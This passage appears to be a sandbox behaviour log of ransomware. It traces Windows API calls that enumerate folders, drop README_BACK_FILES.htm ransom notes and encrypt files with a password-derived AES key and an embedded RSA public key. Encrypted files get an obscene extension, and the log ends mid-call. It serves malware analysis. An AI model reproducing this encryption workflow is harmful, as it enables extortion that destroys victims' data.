[0237.771] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.771] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28589e0) returned 1 [0237.772] CryptImportPublicKeyInfo (in: hCryptProv=0x28589e0, dwCertEncodingType=0x1, pInfo=0x28500f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850128*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850130*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2846820) returned 1 [0237.772] CryptEncrypt (in: hKey=0x2846820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.772] CryptEncrypt (in: hKey=0x2846820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858d10*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2858d10*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.773] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858d10, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.773] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2864990, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x2864990, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.773] CryptEncrypt (in: hKey=0x2846660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2864990*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x2864990*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.773] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2864990, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.773] CloseHandle (hObject=0xffffffff) returned 1 [0237.773] CloseHandle (hObject=0xffffffff) returned 1 [0237.773] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.773] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.773] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.gsg")) returned 0 [0237.774] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml.fuck")) returned 0 [0237.774] CryptDestroyHash (hHash=0x2845de0) returned 1 [0237.774] CryptDestroyKey (hKey=0x2846660) returned 1 [0237.774] CryptReleaseContext (hProv=0x2858958, dwFlags=0x0) returned 1 [0237.774] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.774] FindClose (in: hFindFile=0x2846460 | out: hFindFile=0x2846460) returned 1 [0237.774] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.774] AreFileApisANSI () returned 1 [0237.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.775] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.775] GetLastError () returned 0x5 [0237.775] GetLastError () returned 0x5 [0237.775] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.775] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.775] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\readme_back_files.htm")) returned 0xffffffff [0237.775] AreFileApisANSI () returned 1 [0237.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.775] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.776] GetLastError () returned 0x5 [0237.776] GetLastError () returned 0x5 [0237.776] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.776] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0237.776] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\readme_back_files.htm")) returned 0xffffffff [0237.776] AreFileApisANSI () returned 1 [0237.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd028, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0237.777] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.777] GetLastError () returned 0x5 [0237.777] GetLastError () returned 0x5 [0237.777] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.777] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Search\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28463e0 [0237.777] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.777] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.777] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Search\\Data\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0xffffffff [0237.777] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Search\\Data\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\search\\data\\readme_back_files.htm")) returned 0xffffffff [0237.778] AreFileApisANSI () returned 1 [0237.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0237.778] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Search\\Data\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\search\\data\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.778] GetLastError () returned 0x5 [0237.778] GetLastError () returned 0x5 [0237.778] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0237.778] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.778] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Search\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\search\\readme_back_files.htm")) returned 0xffffffff [0237.778] AreFileApisANSI () returned 1 [0237.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd1d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0237.778] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Search\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\search\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.779] GetLastError () returned 0x5 [0237.779] GetLastError () returned 0x5 [0237.779] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.779] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\SmsRouter\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0xffffffff [0237.780] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\SmsRouter\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\smsrouter\\readme_back_files.htm")) returned 0xffffffff [0237.780] AreFileApisANSI () returned 1 [0237.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0237.780] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\SmsRouter\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\smsrouter\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.780] GetLastError () returned 0x5 [0237.780] GetLastError () returned 0x5 [0237.780] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0237.780] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2845ea0 [0237.780] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.780] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.781] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.781] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.781] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.781] GetLastError () returned 0x5 [0237.781] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp")) returned 0x20 [0237.781] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp", dwFileAttributes=0x80) returned 0 [0237.782] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.782] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.783] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.gsg", dwFileAttributes=0x2) returned 0 [0237.783] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.786] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.786] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.786] CryptHashData (hHash=0x28463e0, pbData=0x2ecaa8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.786] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2845de0) returned 1 [0237.786] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.786] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.786] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2857e30) returned 1 [0237.787] CryptImportPublicKeyInfo (in: hCryptProv=0x2857e30, dwCertEncodingType=0x1, pInfo=0x28501c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28501f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850200*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2846aa0) returned 1 [0237.787] CryptEncrypt (in: hKey=0x2846aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.787] CryptEncrypt (in: hKey=0x2846aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858958*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2858958*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.787] WriteFile (in: hFile=0x5d10, lpBuffer=0x2858958*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2858958*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.788] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2856d60, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2856d60, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.788] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2856d60*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2856d60*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.788] WriteFile (in: hFile=0x5d10, lpBuffer=0x2856d60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2856d60*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.788] CloseHandle (hObject=0xffffffff) returned 1 [0237.788] CloseHandle (hObject=0x5d10) returned 1 [0237.791] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), bFailIfExists=0) returned 0 [0237.796] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp", dwFileAttributes=0x0) returned 0 [0237.796] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.gsg")) returned 0 [0237.797] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.fuck")) returned 0 [0237.797] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.797] CryptDestroyKey (hKey=0x2845de0) returned 1 [0237.797] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.797] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.797] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.798] GetLastError () returned 0x5 [0237.798] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png")) returned 0x20 [0237.798] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png", dwFileAttributes=0x80) returned 0 [0237.798] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.799] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.799] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png.gsg", dwFileAttributes=0x2) returned 0 [0237.799] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2858160) returned 1 [0237.802] CryptCreateHash (in: hProv=0x2858160, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0237.802] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0237.802] CryptHashData (hHash=0x28463e0, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.802] CryptDeriveKey (in: hProv=0x2858160, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2845de0) returned 1 [0237.802] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.802] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0237.802] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28581e8) returned 1 [0237.803] CryptImportPublicKeyInfo (in: hCryptProv=0x28581e8, dwCertEncodingType=0x1, pInfo=0x2850c58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850c88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850c90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28468a0) returned 1 [0237.803] CryptEncrypt (in: hKey=0x28468a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0237.803] CryptEncrypt (in: hKey=0x28468a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858270*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2858270*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0237.803] WriteFile (in: hFile=0x5d10, lpBuffer=0x2858270*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2858270*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0237.804] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2868998, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0237.804] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x2868998*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0237.804] WriteFile (in: hFile=0x5d10, lpBuffer=0x2868998*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2868998*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0237.804] CloseHandle (hObject=0xffffffff) returned 1 [0237.804] CloseHandle (hObject=0x5d10) returned 1 [0237.809] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png"), bFailIfExists=0) returned 0 [0237.814] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png", dwFileAttributes=0x0) returned 0 [0237.814] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png.gsg")) returned 0 [0237.814] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\guest.png.fuck" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.png.fuck")) returned 0 [0237.815] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.815] CryptDestroyKey (hKey=0x2845de0) returned 1 [0237.815] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0237.815] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.815] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0237.815] GetLastError () returned 0x5 [0237.815] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png")) returned 0x20 [0237.815] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png", dwFileAttributes=0x80) returned 0 [0237.815] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.816] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\User Account Pictures\\user-192.png.gsg" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user-192.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0237.821] SetFileAttributesA 